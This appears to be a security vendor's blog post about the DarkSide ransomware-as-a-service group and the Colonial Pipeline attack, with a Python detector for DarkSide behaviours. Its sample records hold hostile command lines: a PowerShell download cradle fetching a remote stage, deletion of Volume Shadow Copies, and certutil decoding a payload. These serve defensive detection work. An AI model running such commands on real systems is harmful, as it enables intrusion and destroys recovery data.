March 01, 2022
Dealing with DarkSide
Brian Krebs reviewed more details about ‘DarkSide’ and this ransomware group’s role in shutting down the Colonial Pipeline. DarkSide is a group that packages and provides ransomware capabilities as a service. Other ransomware gangs and organisations pay a fee for DarkSide tools and services making it difficult to provide accurate attribution.
This group packages and modifies common backdoors like Harpy, Sekur, and Cobalt Strike with their own custom loaders and management interfaces. They configure and deploy various ransomware packages like REvil ransomware, none of which are actually unique to DarkSide. It’s not the malware they sell or the particular techniques used that make them effective; it’s the fact that they are well organised and experienced. This group has an entire intelligence arm and streamlined operating procedures that start with researching their victims, ensuring they are vulnerable, blind, and capable of paying ransoms.
How to deal with DarkSide:
So, what can you do about this potential threat? It might seem simple, but prioritising security infrastructure and monitoring will be the keys. DarkSide has benign recon and intel gathering stages that can safely determine the capabilities of their victims. This group tends to avoid well defended organisations and victims with the capabilities to find them, such as behavioural detection and response. CISA has also published recommendations for preventing business disruption from ransomware attacks.
Techniques to look out for:
- DarkSide uses PowerShell to download the first malware stages and prep systems.
- They delete Volume Shadow Copies via PowerShell.
- They decode and execute malware via certutil.exe.
- They can perform privilege escalation on older operating systems like Windows 7 (none seen yet for most modern OSes).
Once recon is performed, they spread fully through the network and begin PR campaigns prior to execution of the encryption/ransom. This is an opportunity window for detection and mitigation if you have an active MDR service watching for these behaviours.
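The first three behaviours in the list above (PowerShell download cradles, shadow-copy deletion, certutil decoding) map directly onto process command lines that endpoint telemetry records, so they can be turned into simple detection logic. The Python below is an added example, not code from the original post or from any MDR product; the log records are constructed in the style of Sysmon process-creation events, and the vssadmin/wmic shadow-copy patterns generalise beyond the PowerShell variant the post names.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# These are illustrative, not telemetry from any real DarkSide incident.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage1.ps1')",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell Get-WmiObject Win32_ShadowCopy | ForEach-Object {$_.Delete()}",
    "Image=C:\\Windows\\System32\\certutil.exe "
    "CommandLine=certutil -decode C:\\Users\\Public\\payload.b64 C:\\Users\\Public\\payload.exe",
    "Image=C:\\Windows\\System32\\notepad.exe "
    "CommandLine=notepad C:\\Users\\alice\\notes.txt",
]

# One regex per behaviour from the post. Rule names are our own labels.
RULES = [
    # PowerShell fetching a remote stage (download cradle).
    ("powershell_download_cradle",
     re.compile(r"powershell.*?(DownloadString|DownloadFile|Invoke-WebRequest|"
                r"\biwr\b|Net\.WebClient)", re.I)),
    # Volume Shadow Copy deletion via WMI/PowerShell, vssadmin or wmic.
    ("shadow_copy_deletion",
     re.compile(r"(Win32_ShadowCopy.*Delete|vssadmin.*delete\s+shadows|"
                r"wmic.*shadowcopy.*delete)", re.I)),
    # certutil used to decode or fetch a payload instead of managing certs.
    ("certutil_decode",
     re.compile(r"certutil.*?(-decode|-urlcache)", re.I)),
]


def extract_command_line(event):
    """Return the CommandLine field of a record, or '' if it has none."""
    if "CommandLine=" not in event:
        return ""
    return event.split("CommandLine=", 1)[1]


def scan_events(events):
    """Return (rule_name, command_line) for every rule that fires on each record."""
    hits = []
    for event in events:
        cmd = extract_command_line(event)
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, cmd))
    return hits


if __name__ == "__main__":
    for name, cmd in scan_events(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

In production these patterns would be tuned against the environment's own baseline (some administrators legitimately use vssadmin), but the three rule hits on the sample records are the same signals the post tells you to watch for.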
To learn how to protect your clients from the most sophisticated and malicious cyber threats, set up a demo with one of our representatives.